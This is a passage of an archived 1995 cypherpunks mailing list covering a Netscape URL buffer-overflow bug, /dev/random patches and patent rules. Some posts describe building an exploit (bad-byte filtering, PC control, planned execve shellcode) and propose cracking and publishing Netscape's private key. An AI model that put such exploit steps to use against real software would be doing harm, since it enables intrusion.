'executables in email' much more dangerous than Java, which at least tries to address security? There is the argument that the claims will inspire false confidence in Java's security mechanisms, and thus people will be bitten, but I don't buy it. People don't look to security as a chack item when buying software. And when they do, they're usually not capable of distinguishing between the pap that passes for security through marketing from security by design. Adam -- "It is seldom that liberty of any kind is lost all at once." -Hume From shamrock at netcom.com Fri Sep 22 12:46:37 1995 From: shamrock at netcom.com (Lucky Green) Date: Fri, 22 Sep 95 12:46:37 PDT Subject: The Next Hack Message-ID: <199509221944.PAA06418@book.hks.net> -----BEGIN PGP SIGNED MESSAGE----- In article <199509211832.LAA24086 at infinity.c2.org>, sameer at c2.org (sameer) wrote: >Proposal for action: > >1) Reverse-engineer a server to see if the keygen phase uses >a weak RNG seed. -- if so, determine the exact algorithim. > >2) Organize a net-wide search over the space of the RNG seed to >crack the private key of some well known secure server. > >3) Release the private key to the net. Count me in. Let's start with Netscape's own. - -- - -- Lucky Green PGP encrypted mail preferred. - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBMGMSJSoZzwIn1bdtAQFqiwF+IZKDv1t5Q2va2yE2JZMCHGITkxoDHHML alvjYK+XyxPNaVGgRgMk5gTsZMcHqBvz =meVk -----END PGP SIGNATURE----- From dmandl at panix.com Fri Sep 22 12:47:17 1995 From: dmandl at panix.com (dmandl at panix.com) Date: Fri, 22 Sep 95 12:47:17 PDT Subject: Another Netscape Bug (and possible security hole) In-Reply-To: <199509221927.PAA16372@homeport.org> Message-ID: On Fri, 22 Sep 1995, Adam Shostack wrote: > Perry E. Metzger wrote: > > | I don't believe the Sun Java stuff would suffer from it, although I > | fear Java a great deal. > > I keep hearing this thought. Isn't Win95 with its > 'executables in email' much more dangerous than Java, which at least > tries to address security? Is that the new MS-Word you're thinking of? I hear that it lets you imbed macros containing executable code in documents. That's got to be one of the most dangerous ideas ever cooked up. --Dave. -- Dave Mandl dmandl at panix.com http://wfmu.org/~davem From cman at communities.com Fri Sep 22 12:52:58 1995 From: cman at communities.com (Douglas Barnes) Date: Fri, 22 Sep 95 12:52:58 PDT Subject: Another Netscape Bug (and possible security hole) Message-ID: Spent too much time last night playing with the Netscape bug; among other things wrote some code to throw various random binary URLs at Netscape. Netscape seems prepared to swallow the bait as long as the URL does _not_ contain characters screened as follows: if ((c != '"') && (c!='>') && (c!=0) && (c!='/') ) { This means you can't plant 0x00, 0x22, 0x3e or 0x2f. Anything else can be made to show up in various registers after things go blooey. I've only made it segfault in different places so far, still working on getting it to do something it wouldn't ordinarily do and not crash before it does it. [Working under Solaris 2.4; I may try my luck on Macs, since this bug crashes the whole OS... need to load up debug tools first though.] Hope this helps others... Doug From frenchie at magus.dgsys.com Fri Sep 22 13:04:54 1995 From: frenchie at magus.dgsys.com (SysAdmin) Date: Fri, 22 Sep 95 13:04:54 PDT Subject: Another Netscape Bug (and possible security hole) In-Reply-To: <43tpv8$rom@tera.mcom.com> Message-ID: -----BEGIN PGP SIGNED MESSAGE----- While browsing my mail I noticed that Jeff Weinstein wrote: > > OK, Perry was right, and it was wrong of me to argue with him based > only on the code that I have personally seen. As we have already > determined, I have not reviewed every line of code in netscape. > > Not that I want to divert attention away from netscape(OK, maybe I > do :-) ), but does this bug exist in any other common browser? > > --Jeff > > -- > Jeff Weinstein - Electronic Munitions Specialist > Netscape Communication Corporation > jsw at netscape.com - http://home.netscape.com/people/jsw > Any opinions expressed above are mine. TkWWW under Linux 1.2.12 dies with a Segmentation Fault with this bug :( - -- =====================PGP Encrypted Mail Preferred======================== PGP Public Keys: 1024/BEB3ED71 & 2047/D9E1F2E9 on request. As soon as any man says of the affairs of the state " What does it matter to me? " the state may be given up for lost. J.J.Rousseau - The Social Contract GAT/E/O d++@>- H--- s: a29 C+++$ UL++++($) P+>+++ L++>++++ E W+++ N++ K- w---- O- M- V-- PS+ PE++ Y+ PGP+++ t 5+ X R* tv b++ DI++ D++ G++ e h+ r y++ [Geek Code v3.0] a.k.a [ root at magus.dgsys.com / vamagus at delphi.com] ========================================================================== -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAgUBMGMWyLbmxeO+s+1xAQEa4gP8DLVEoZwrVtqMpztIrCH6sSAdEoUZf3jU c2AgSNwvqv4/CbGeTxZ7UBFO4hjbUJPlmvwfY0J6yAfsKnYvSxKL55VtbAQzSuac 2KjUSIUh23wpe9hpJaURpK8NM6tlDs2GsoVmdIRL1wFpdwurAeijH1JhSqrJFdKN b+/jeyTw9+0= =7ZJq -----END PGP SIGNATURE----- From rjc at clark.net Fri Sep 22 13:19:13 1995 From: rjc at clark.net (Ray Cromwell) Date: Fri, 22 Sep 95 13:19:13 PDT Subject: Another Netscape Bug (and possible security hole) In-Reply-To: Message-ID: <199509222018.QAA11163@clark.net> > > > Spent too much time last night playing with the Netscape bug; > among other things wrote some code to throw various random binary > URLs at Netscape. Netscape seems prepared to swallow the bait > as long as the URL does _not_ contain characters screened as > follows: > > if ((c != '"') && (c!='>') && (c!=0) && (c!='/') ) { > > This means you can't plant 0x00, 0x22, 0x3e or 0x2f. Did you check 0x20 and 0xa0? (space and shift-space) I'm sure that a space will terminate the href in . I've been playing around with Netscape today and I achieved two things. First, I've isolated a routine very near to where it crashes (if I set a breakpoint in GDB, it only hits the breakpoint when a domain is looked up by any method) Secondly, even without disassembly I've been able to place an exact value in the PC register (0x61616161). Now, all that's left is to 1) find out where the stack pointer is, 2) make the PC point to some area near the stack pointer, and 3) create some code which does a syscall on execve with "xterm" as the argument, with the restriction that it cannot contain any of the above illegal codes. #3 is the hardest for me since I've never done assembly under BSDI but I assume it's some sort of trap call I need to do. Once all that is done, just package it up into a URL and you are set to wreak havoc. If someone else exploits the hole before I do, I would urge you not to reveal the exact implementation to any mailing lists for the simple reason that even a benign exploitation can be easily modified to be dangerous. Security through obscurity, I know, but think about it. Once you have the URL, anyone can exploit the bug by pasting it into their home page. And with the way the net works, this would probably seem "cool" to most people and it would spread like wildfire. If you don't reveal the implementation, then perhaps that will buy enough time for most users to upgrade to Netscape 2.0 before crackers start exploiting it. [this bug is far more dangerous than the RNG bug or the 40-bit crypto] -Ray From adam at homeport.org Fri Sep 22 13:19:43 1995 From: adam at homeport.org (Adam Shostack) Date: Fri, 22 Sep 95 13:19:43 PDT Subject: Another Netscape Bug (and possible security hole) In-Reply-To: Message-ID: <199509222019.QAA16468@homeport.org> dmandl at panix.com wrote: | On Fri, 22 Sep 1995, Adam Shostack wrote: | > I keep hearing this thought. Isn't Win95 with its | > 'executables in email' much more dangerous than Java, which at least | > tries to address security? | | Is that the new MS-Word you're thinking of? I hear that it lets you | imbed macros containing executable code in documents. That's got to | be one of the most dangerous ideas ever cooked up. No, this is a seperate problem. Its not auto-executing code in Microsoft documents that worries me, so much as the ability to include executables as clickable images in a mail message, with the user having no control over what environment the program executes in. If strong fences make good neighbors, where are the fences in my network neighborhood? Adam -- "It is seldom that liberty of any kind is lost all at once." -Hume From dvw at hamachi.epr.com Fri Sep 22 13:19:55 1995 From: dvw at hamachi.epr.com (David Van Wie) Date: Fri, 22 Sep 95 13:19:55 PDT Subject: Patents and trade secrets was: Encryption algorithms used in PrivaSoft Message-ID: <306319E6@hamachi> Perry E. Metzger at Sep 22, 95 01:19:37 am wrote: >David Van Wie writes: >> It just moves the prior art date from the date of invention to the date >> of filing the patent application. >What happens if the chronology goes like this ? > >(0) Alice invents a snaffleblort. >(1) Bob invents a snaffleblort. >(2) Bob files for a patent on a snaffleblort. > >From what you said, it would appear that Alice's prior art won't count when >it comes to considering the validity of Bob's patent claim. Is that correct ? Unless Alice made public statements about her invention, you are right. Something becomes prior art when it is made public. If she (like most patent lawyers will advise) kept her mouth shut about what she had invented until her patent application was filed, she would lose under first to file rules (assuming step three is that Alice files a patent application). A quick trip to the soapbox: First to files rules are good for big companies, and bad for small inventors. Big companies have many lawyers, and know exactly how each step of the process works. Small inventors usually don't know the process as well, usually have to scrape together the thousands of dollars necessary to pursue a patent, and then find a good lawyer that they can trust -- all while ensuring that they don't break one of the rules about how you must treat your invention before filing. Moral: First to invent rules, like "natural copyright," are good for the little guy because they base patent decisions on when the important things (i.e. invention and reduction to practice) happened, not administrative things (i.e. complex documents filed with dotted i's and crossed t's). From tytso at MIT.EDU Fri Sep 22 13:40:17 1995 From: tytso at MIT.EDU (Theodore Ts'o) Date: Fri, 22 Sep 95 13:40:17 PDT Subject: /dev/random for Linux In-Reply-To: <199509210349.XAA06110@frankenstein.piermont.com> Message-ID: <9509222039.AA25206@dcl.MIT.EDU> > > On this same track, I suggest that "/dev/random" devices for unix are > > an excellent idea. Ted Tso did one for Linux that steals all the bits > > of semi-random timing information it can. > > Anyone know where I can find more information on this wonderful device? I've just sent patches (versus the Linux 1.3.28 kernel) off to Linus. There's a fairly long exposition at the beginning of drivers/char/random.c which explain its theory of operation. There are some things that I had wanted to do to make it better; for example, not use MD5 in the inner bucket-mixing, but use a CRC-based mixing algorithm that Colin had suggested; this should be much faster, and since I'm using MD5 on the output side of the random number generator, it should be good enough. Also, at some point I want to add code so that it can sample the Pentium instruction cycle clock register, which will give us a much finer granularity clock with which to measure events. However, given the current interest in random number generators --- thank you Netscape for providing such a wonderful object lession! :-) --- and keeping in mind the saying that the best is often the enemy of the good, I've decided to make what I have available now, and worry about improving it later. In any case, here it is. With any luck, it'll be included in the 1.3.29 Linux kernel; the idea is that application programs running under Linux should be able to assume that /dev/random exists and that they can rely on it. Perhaps if enough free OS's do this, commercial OS vendors will get shamed into providing /dev/random on their Unix systems. Or better yet, perhaps hardware vendors will decide it's worth including the $10 (if that) worth of parts necessary to have a real, hardware-based random number generator in their machines. If there are any representatives from such computer manufacturers, please consider this a hint. :-) - Ted begin 644 patches.random.gz M'XL("'WS8C " W!A=&-H97,NCSOQ9)%201O MVG$VM$39G)4E#4G9DY?-:!I @\0:!!@A&BW/G:#K/Q$0M1<,2C>:;=N--LT-;VB]^_EF<7 MIQ>O7YR*UR+?*W#W0"1I'(4S,RC";&&K6,Q4J&*91C%MX$V?<;4?A:)^WF_4 M1""35"PBU_=\Y>+N,Y!PADMI)?]U&2W7L3^;IV(Z5Y$;Q4I,DU=1C=GAO]OG M0 at R"0/"J1,0J4?&3^&D*PI=Q].2[^)'.98J_% X* M at FCE0R!.%+H^;4KX&-JX4.D;?K#.MZA+1.3E9#F1BZ49!!2K5()<.E?:T1-- M&:GP*?@31JGOJ!JS0LM4F/HYA0G+6Z\@KGU(2<^GZUI^@!\Z0>82O;0=)#F! M]!?0(.A9R1A:37V5L%!%8Y=J'%N18$XUQ.)FN/0 PM.YGX@ 9]*%I<@*ADIY M5FC3,LF/* MJ&'J,Q@"G;,FBH6MR(1 601)PBAA3IC%V8LH+>C1W$/8KB*//.+$:"YDNFT M*ZSA\BP$&P:)<,;J=3(>#*W%W75$[G!*$.*Q2N.OQE(B%%MD/M5^$ MRE%)0A;D9HH$*\42PH39R4#8T at 5%(%SR&> M72D5EE2$;L%-]2ZR)'(=1=MQ MXOO)U5F2KH.*(9Z?E"*=?AQ-Q.3N>OIE,!X*_+X?WWT>70VOQ+_^-9A at X-4K M,;B]PO]^$<-_W(^'DXFX&XO1I_N;T?"*C\#.\>!V.AI.:A#%YCV0TV\ M?YB*V[NIN!E]&DUQWO2NAMN&^=;*-CX%POLT'%]^Q-#@_>AF-/V%[[T>36_I MSFM<.A#W at _%T=/EP,QB+^X?Q_=UD*$ V[[\:32YO!J-/PRM(>W2+J\7P\_!V M*B8?!SF)B;W MP\L1_1C^8PCZ!V.8'S9?WMU.AG]_P"),BJO!I\$'P\[QGT@"8KY\& \_$85@ M??+P?C(=31^F0_'A[NZ*9,S'3(;CSZ/+X>2MN+DCR5^+A\FPAINF R8 QT!" MF":^'B8CEM7H%FXR?KB?CNYNM:H_WGV!,$#O -NO6+!WM\PZY'(W_H4.)IFP MW&OBR\SFDV3LZ MZN_#'#W XN - 3J],^*4=98CV)T+097GW'.56XNM $F M,!D9R77Y_3G1%3< M@[PVQB(XE)A)BJR429Y\)'X.O &"HP^7YD ',$()QZ"-FE"I+ MX:"S*'(W,0.6)IF?2CN at J!\+)UXOTV at 6RR7B$85='0/?JP1Q/&%B(_O)C[)D M=VE"<1& (#^:LR_20,3W\CET1:(4I[[IY3U^_YZIT%$E-42N3B/+0")((3 J M'..G>>@"&0A]3##BUEP^E??I&$JW4MJ(PF!MF*T)A&6LC2F)\"E+1$^$+6&O M<:.0:2J=KRHN80SA'T1'Z"=:$J9"?./Q=[M_JO!IL43X-YQ#$>O\'B97ZXA" M\D?FF7D2ZEL:JX4"K42?#JR1*))YG*F"C8)1RK@(JOHV ,(S(3&X7$8Z36H. M$Y6YT=FVMO,\$PHE$Q]'&]"(C9!%EI!FI#:<8!8A)[G&@ESE44(5(7VUXFA&:QJ5T M+I(]VQ*1"0H)]Q2]4\;<^)8GD #X9FK""3Y(? 3 @GM M/+9/2 at E+[7FYH(UL8Y+S M:7Q:3^\2Z'$'MB1)#C)NFZ&D?"_&$*J*&6<-$H M"E[FCD&P#@ 2U8YUJ(O1Q? B$%>7%0T%&36,J'?03J!0E(DA]#<7[A*I?DS+GT0J0 M,USS,3;5%YL:YI!H$V!+X%$,QLQ5&P97M<6(+)[5%\(K$H!Z53&D+W.Q?G1^EA&^=K+X/P4W>13Y+L(KHB)5=UM,EE*;B<2<9U+Y<)L MOG&5SD&18OB?*D<7H%IY",)*PH at JLBK-JHRS9*!%;*2=8.M)4;UDW(BJ.EU7 MZ=TKN5/6[.,F+T at STJ5#HLI5(!*V>OB68^41C-B$^*0?Y$E6QU$8W5>E M2>3P3G9 at Y_7ZCGG].],2XIH52 "'%5HKSS" QU7, .X@ R_VYXY0]8/N M\XP2RF8%&7*1VDN(R&;#H8,UG&0.58 at D+U9V;DE;EVE>M8#NYWX at _E/&H3A> MS2-&.PQ'2%X+YQFW2%X@ M!$4^=4<8="5DKRGE<(]W&')DWJC;!,MTMLGK"4),X)+./>G'!/405^$F8'7*T)H<))W'2G&TW#K\K>X'^7'" MD"\*=>"?A270S-LSK!^2E)&R!B1O"DA]Q!%YIM)'K9E'SB7'//K:SCR&&"+D MT9.W%23N)R5!N("ZCUS/F 8$L&5"1!N3+T,ZGU1:.-<3#%VW=^)RSX#_0C B M746F$*F(FF6%">KFPLXP:4"];@>;B_,&"8]EIG$K-I:0YJMU%X'$%>59!M5S M?Z83S>^9#/QT74WO?I*G7G%,.]4WN5@&"/[T .B6^SSUKTX,]QS at 6'*Z*-+B MDX at XW_Q%MLC=N91 at -:16[CZ69>C3:?[YB'-21EV3JW8B[Y;$J^(J"EJ*KP3V M.329ON7"3W4\JQA#SJC."!JE:'T5>M:8;$%=;=K,/[9A3=%>TY:1=PQG_A-' M0'^A"O"QD4/@JS'%N'BF\F0&4 at U]21:PU06(]?&63BOP_YI[G@;85:N>6IXE MREJ at 4OL4GO)L;/##PT)#M?K59I[%,=4'>P(#BT%75229C;I*9[BR.<&-7^,G MD/&;4NTZ)@"6/^9%QV-I;L=9:"(-"58DR*C4I=>QH;*UJ#NJ>RF6^/'O9G'! ME8YD!6*GK at 635U0^C.I-<<.(;J4"A@@YYLK)H+'O M3>>_."8OO77U0.TD9Q[Q.P5;.3++N]>FA"(S-[%E\PR3.F(URP)IP,F<6P35 MAHDNU(KFC!!7?O)UBRF39FV54C0V!6&>[PT+)$=#AKM[ @<"/B8+*[?KJJ,L MQ at P(+I#?7OA9B952+&4,)$(,EC>2*8=(B]C@<3\&093*/(XN2"E?-23W*FF7 M9&.L)HI=3CE!*I,\H.Y4Y*6]#9ROP).!*'#-YLS\&5."M"_GI/B#"#J T M;)2!GY\\%^;A'UP,\Q+9_TJ^?< M2B-EK0^U>_& MLD2_"&$45J!,UH])AK.0BQ8N>KTL+OH.Q;M.2'FQ3E0 D)&04:V%%\B55G\2 M!=1B6S#T6N(BW_8I0->*/&XPFGD7!7O,7_,8/]3OJ]B=[C_XR"J#:^P ">J51I$\.6;QLRUL5!<<,;(K2 M9JG?+4'&R+V5TIF[%ALHU)DKYVN2+4Q]J>$Z)#6.4&&X8 at R-)B;1YKU7\])/ MWS:^OA16LV'5Q,NI*2P^T5NEF8*CSJA9-]'QE:HT M"K6]I=$2-)IW:T5KH3 0OKS;KN/R2N]G##]9@$+7M M)V!.%- 9]OF1GNV+F M=+Z421I [C4Q29%=Q64<49S1'/]->9Z8.%!B8* A=_3_ZGNN\H!!PNP;/9G& MV8\\<)% I.[Y_*?=&=.=VS>UD/\=Q7MGZ-5:.-L[94 E354G9;*X2-2,=+2U MC6:0#_>-1GH04O.]"H^7=[?7HP^/X\'MU=TG'L/KC;84$3E>, AYU?X>H*%!$@$+LB+Z!>*1U^>%'>HB# M:CD64E2O'"^I-;F74?/$][TMEH+&9H/G'HE0 at C>_6IW?-A;T\KVTXM=&JL(R2P^C6Y+4\## ML:S9)^+XF+JY/U+G]D3\![=VW_!#:5A'Q?V,W#S4_G.#V([W2O9U5;0XB)19 M'3K[R1B7>"?J;WKO;-BQT_\F%/9KI/T@^S!0+TP]]>H_N M?U=N_"[^*=>?;S&K^\G;'+Y MPD:Y$)N^UP0]5AQOIOXJ1B"QI[Q,7W-9LM0)UN9:!?7(8H .A%C.E\ M<7>]0.M>D#>\X7F^3M>>L#H<6E= IXR!0K5B&@$^<,3#TJ788@=(KN4K09IG M\P+01&$+!*U+<+:T\C2OZ!-7.HT7FX$$=TQS0S_6(=/.O%];O\&&CXZ.3!1E M0(OC*7X:C]03$*5=$P[DSF'N2$*LM+].8>_(-D\6/SGFJ<%/KGEJZ@!YE.OS M&HBH/)7:6K^*^F^G]6]NMR-EJ]N#EKKDKQL[W,HFVF'1#M5SNG:WW:D)J[&S MPZELHAT-VM%H->K=NHLA:_<.N[*)=C1IAV/9KJ,48%!C]XYM/EJTPVMWG;HG MO8/X:-,.,-UU. at UY$!\=VB%[S7JK8S4/XJ/+5+FM3K]=MP[BHT<[.OU>O=]S M#]-'GW;T[%;+ZQ+G?\Z'Q3KW\*=MV]8A?%BL\UZ_[;A=^R!]6*SSCMVO6U:C M<0@?5E/+JM_K6OWF07RPSF6GVV\U>^H@/K3.^W:KWFL4^JCN:>QJA'GW.I9J MM#O$27OSEL:N1MA.G'JK;C=;J -$?V?'-B=\1Z/35FW9)HVT=G9L6Q;K4/7M MCM.5&&K4=W9L\\&\NYV&9]7;[B%\:#NI-UHMJ]5N'L2'OJ,G+=7I'<8'ZU!U MW:9G.[V#^&![;UC*Y!?+#?MMIM M:;7HW?.?\Z'M7?954_7K[8/LBGW*MA-K9\=>#^FX?;?#\<3J M[.S8YD1G!%>UF[TZ)AK-G1U[/5VV;*5DJW40'WQ'RW:5X\G^(7R8C-"Q[9;= MJ1_$!WNAK6PX2+=^"!_:LAJ]OMU53N<@/G0TD=)J=#UY$!]\A]M27K/>:Q_" MAXZ*]5:O9[ED[P?H at ST=*F^Y]6;_$#ZT]:J.:_?[JGV07;'M6IYL=!WRJ0/X MX#NA?^EQ !\& MG2C/:W7=@_C0Z*3=:[5=USJ$#X.R/-GKJI9W"!_:3CS5<%1'U0_APZ#%9MUJ M-:W6(7QHOVVI>L^RY&%\Z!C7;3>[JMTVI==HM at _B0Z-WZ7;=AFT? MI _V6V7W.FZS7_!!-0M7+U0&/#7YT\L@/H3^/F)/YT?(I'S?I;_>U=^1 M8!-J[=\SE2F1A7.Y7*[WU80+_YLYRWQ?\&1JOF<:3:CDGNE!G8 at GTQ4\\FOT MUN)Q*>G;I[=% ?EZ6?[VGU!W:BW$NWVB(_QW\5I,4AFG8O19-V'X'V5Q=;SU M"0]W@(BQHX5:.,OUL?]4$SB5QT_IE^DBG4&^WU7D8<%)K?+;F$-),_63BET7 M",+<4D*)?>P3A36Q)#D8KD[RN]X*7_Q8Y5SXIZ"!XHY:WO.*N<:VW.-1YG4E?0Y%[T$S_E38?"[@T=<$6!W[^8>=I;OX M84"]J.)E>M[^),J>:\OJQLH1_:,IW5;A9K8SKXP7;7OC=Z#A^"\\('[X051] MX^3_VSO6YK9MY&?Z5Z"^N8QD439%R7JY]HR3*'=I;,MC)]=TV at R'EBF;-?4H M*=G)M+[??OL "#XEQ:G[H7.91*( + @L]@GL(@B4X->0%D*NU<\:I;7:)USH M$9\*0'<);!\E"%M2)K;@ ?#O+#_228*17S+#>!1>$'E4FQO6X]HUI>BY1""- MWM7*QQW*XT5>U2C5@'>?,8(EOW+9M2I=IN3J[, 4:7V$/G'AB"NUXH%W[P5F M;N4>;OW $Q6&J-?%D;!HR7+$ N_;H74R)3QAD]Z67= MZ=);P_P&?9C9SU^S0 K#A3RGUG#L64G/SLR@#C'MJ#V MZ&3,Y*@#6^E"=3Y& A,^,/O%#3#885$01Y:,BWB at Y,8K]RKXPG T6<#NC](F M(&9Q1[R\Y6$0#$RCH at AC&1RAD(]G$;%LI+8HP*DYT,RO_GCL8WB44"="R6-! MGBHTX^;I1O%!8192=YNM56_59XPLG*#P>^ FH>KK^09VHH4=-[$/$G/!,[C4 M&E7%T1'+-]+MM%0DW>0 !)6 #D>BX%Z.CJ1$Q WPA&0!GJZP^*B*%W)VL>*3 MOZLL5C"]&/M-<#\=&@H^[;C&COQFM^TXU031##$,$4I-C 3G &4,?L10C%G M*>1$K$P?8'\L)QSCQ.#$-C<8J "<*>P">@/ CQ\_LB"8>MYUQ(#^%(,;_!M7 M)B(C?0CXFBT75\Z\ AXT*'CT#*L':!$ 68]N9:H"DN7QY?$Y4U21&/2GW$?+ M GN,O8N29NE&18+27BT<]2'G"O&8.E%7Q['ZT/(KP^_6&=(O,B?B%%T3 at UX+T69&H1J4X2Q]I^-L32F5D8;/@$W.%( 11M&GK?SN"BJ=0WZL@?V M\/N3)*9R+2C#ZZ/"K+!L5I2R450&*8=/NRID6F3ZE at ETD59TH8='Q4J59M4> MQE\%WCB.R6;['-T]7YN^<9)Y'(.9M:\HZ)&R34$#4]Z6"A at JMG;)[&$T;&!$ M(?7OX(QC^U8'JK/*7,P<, Q"K31C POP!FX5^4W05#N*B\FMH7B)[ MUTE>=$,LY;EL1/-B0Z*GWGB.T$?3[K39 )-%AUQ$/. at A/)<7\F3]$-&@HBT* M1_F]-"K#DOB+0O^UW3K0]JG,&V!C/PZO0-VH%DKN.4J']]!BOQ:W% MY3:7][I7[O5H[,7E32YO6$U[O]4A099VL:&1F0D(2DZ*O?C1G!&EG?>$XX[5 MM<-VBR>3[UR[_Z.Y]+4!)9K T2LB[]I9S,91A?(V"%#2%X%H!XH=\>)6DI2 M/#35X7X4"G%=\L at DA@D+\+52LLDPC#A:G8/N=- ZF_!*E,4)QEJ:K,^/+TI> M3R9T<>9]TE';,.&%14=6**7T!2P.RZ(J":-8 EFQO$]')V+O:%5E at JS\*8;] M[/"W*0O'R$0[]&4F!%YN@$@,2BP 0U=1OB3#EE+V E[M2ALF57H.' MU/2UNLM,V%E.*5?$N]YXZAPQ(E9AX!M&F BQI"L&#^!'Q\GF*[,59;[>0D9 A^!2+,#,!\T>34#!RZADJ!:3641N^1BP1!E4 MB+11#EP5/=E8--;7?]ALUS%#<2L:)$ MT"2DS.INUPDRL9$DR[SC'ZRDU>*58?5S-=VF$(6?=9COX;?_V;IX=4F3Z,>" MR8TF==P\V(.J/3I-"G9OS?LM$,:A[U%N7NCQA5FBL=O8 at I&,17TIZB'\RO>B M>MCB[+B26 at .%YI[5VT-!VNQ;K7[#,K#WI.Q=!]6$OSV2O/M=LRUJ\ DB'&1O M'/9Z>>R<#4^/+]\9N!G ?U*UP[/!Y;^'[Z&Z&U?'#.0X[P879X,3QTD>O8&8 MN'>#):=X1:XS#MP;SG:A5%W* I7IFU+PB('A%XICG1V M$8PLONZ)4A+QII]EI!-#R^$30 at -Z.;\8OAPD)IJJO#P^/3\9*/T(!1>#R_?' M%^^3VC2!+9 E+T^&K]Z)^(^%^SF,#8?"*T6"* 7XX2P%VE" R^E:T,O! M>UQ!!6HKT,A;+%3J/,."C(_N$/[Y&,4-YK?NMW,*=U/**NGJ+-7;\+>05U:# MP=\V,4O;0F:!SQ7,(IFA6\(L7-OX/[-\!;,TGLHL]M.9I?F7,TOJ3E;DDU/W MSB.MN2F?I'I0T,0BA34%FJ03<\"_Z MAZ3K=]TM<>H,7_YP"9CM'V*#^(=8++XX_FQW)J8./,(WG at _. @^>E.J'QX at N M[X2'7[;J!H.,%OA[3C#WBUV\>&F"CR,G&H6>-Z7&M\!,UX%[O2.1H6Y![A9/P.&%BGK\=5/KTZ.7P\NGYM,<"*CI]$(@>8) MA(KSU&%;Q=11U'R_T6]*TFBCS(1/)HU\GF$ G(FY?ODJ<#Q**M9D'XHD3";[ M4!3E&>) ;9M&:MN*BI5T@'',G3N8I4%/\*#K\(8=!TQ6[\Y SY@?=36F,7D. M-C+X$1MIX1@/TBQ?.4,X52L3'@X1BRKA!ZX9$3D$\ MJEIF5+A'$?L.^#,Y>?R-XS-I@&/$)+:^]D,^S\K4,=L55A&G0XV1K\+5R\(D M< %SF<:(J&V$KL)$S"QBEE^%&>U5_9UP%"MZ$1]Y+&0,$Z)JNJD'.:]N$<%' M#SX>?59.WYX-+RK4NG[D.^&U=U_%37-B at 199:\TV^#8M9@&#;E?J]/'1P.[J M1V-X/QZ!T>QQB0ZH4FVG%W."[*C;)W\VW5%BM3F81^_,$U"O"&A9"B4Q)_!, M?.PN at P4/7N[WU0=GP]>#_^"8'WG2[1Y.NF7MFSV:,V*+#C>\&S\")]D9W2*6 M*J>#4^?T^(?AA;D-Z[!MOI"K at 2.H5O$=\Q 6Z:ZRO9RJ:R]N/+P.[%JR^RC5Y"2A0]RK#/&(A?0VM*O$A=!4I'L]OR#[ M-0,9S/. SZR$8TOEB9I8P^?5L:[+VE_-?JM=K)-+86RK;[=8WW5(W75*%+-R MA at KTK[X!(%?ESW!G[6O5\Y6_ ++C*J+B#K-NIR&I&*G1NW?B6V[H Y*;V9\ M_;IS=T6;0"%S0AGME6TG);?E%"U"1WA/"-'APKWZ>7SC2#OP$[Q$&/!&J,3W M\CE,3>@6?S:YN>'H=H_V<]C5(Y+#>Q,VI[9<%P1.Q%9V;#8@)4"BK\ M3=X_OR/DPR%YR36ZIX"+#HAZ[E#5[>I;?2 at .HE8KEXPHIKD#4 SD[;_(N<]Q MD&/QIC%O&,?B5/5&+KP78CT>_M_ at 5JMXE,QF6PU:':O]-YPL6BAJLL_ D[QO M]&U,F>HCPY7YNH(MK5Z:+=?#M/K[MO02FNPE--72KUI*A6(F KG\3 M_Y3KO MX06$_BAU819:)MYG;[14U^.A14J'H6(&2O$6H_C0O2D;3KP+5B6#:27C/(\E M0?M33$+7WA.L"(8GV)0%D2 at OL!YZ.>NAO+W=Z#?VI>70;N!^#WWS3JC!Z(W< M>X]W*BOTB:QGC (?K;RZM$/I%D,',%JY??#'8+8C;N&%I+_-U&J8 at IO@?\-2 MY6"83?H@ SK9SQ]9BLMU+-"DIINI<\./#6'\/X[>'+\]&;S^;IMKI!7>>'ZB M& DT4/4Y $J_H.Y%7IP>3 /HJ\Z$-C_ %)CF>/=:P end From cman at communities.com Fri Sep 22 13:49:15 1995 From: cman at communities.com (Douglas Barnes) Date: Fri, 22 Sep 95 13:49:15 PDT Subject: Another Netscape Bug (and possible security hole) Message-ID: >> >> >> Spent too much time last night playing with the Netscape bug; >> among other things wrote some code to throw various random binary >> URLs at Netscape. Netscape seems prepared to swallow the bait >> as long as the URL does _not_ contain characters screened as >> follows: >> >> if ((c != '"') && (c!='>') && (c!=0) && (c!='/') ) { >> >> This means you can't plant 0x00, 0x22, 0x3e or 0x2f. > > Did you check 0x20 and 0xa0? (space and shift-space) I'm sure >that a space will terminate the href in . > This seems not to be the case. See: http://www.communities.com/foo/bad.html (which contains these bytes fairly early in the sequence, and still does a lovely job of crashing.) Showed the bug to EC's president, he immediately wanted to try it. It completely blew his PPC Mac (I've got a Powerbook 540C) out of the water. (Error of type 11, dialog with only the restart button.) My powerbook hangs on for a bit and then locks up. Onward to the exploit! From lull at acm.org Fri Sep 22 13:52:27 1995 From: lull at acm.org (John Lull) Date: Fri, 22 Sep 95 13:52:27 PDT Subject: Another Netscape Bug (and possible security hole) In-Reply-To: <199509221341.JAA07664@gold.interlog.com> Message-ID: <199509222051.NAA10687@ix.ix.netcom.com> On Fri, 22 Sep 1995 09:47:35 -0400, herbs at interlog.com (Herb Sutter) wrote: > Don't just look at this bug, though... check ALL your static buffers and > include code to check for overflow writes. For example, if Netscape is > written in C or C++ and the above code uses strcpy(), you could change > strcpy() to strncpy() everywhere (and then set the last char to null in case > strncpy() didn't). Your programmers will know what I mean. Better yet, ban both strncpy and strncat. Replace them with differently-named routines (strbcpy and strbcat?) that, given a buffer length, are GUARANTEED to always give you a properly terminated string that (including the terminator) does not overflow the specified buffer. Even better, use a good string class that does all this automatically all the time. From sameer at c2.org Fri Sep 22 14:08:40 1995 From: sameer at c2.org (sameer) Date: Fri, 22 Sep 95 14:08:40 PDT Subject: Another Netscape Bug (and possible security hole) In-Reply-To: Message-ID: <199509222103.OAA02827@infinity.c2.org> > > > > Not that I want to divert attention away from netscape(OK, maybe I > > do :-) ), but does this bug exist in any other common browser? > > > > --Jeff This shows that Netscape will probably, after much bad press and sleepless nights on the part of netscape developers, become one of the best secure programs out there. The cypherpunks will have won because there will be a secure program available with the backing of lawyers. Netscape will have won because their product will be the best. -- sameer Voice: 510-601-9777 Community ConneXion FAX: 510-601-9734 An Internet Privacy Provider Dialin: 510-658-6376 http://www.c2.org (or login as "guest") sameer at c2.org From Dave_Neuenschwander at va.arca.com Fri Sep 22 14:27:01 1995 From: Dave_Neuenschwander at va.arca.com (Dave Neuenschwander) Date: Fri, 22 Sep 95 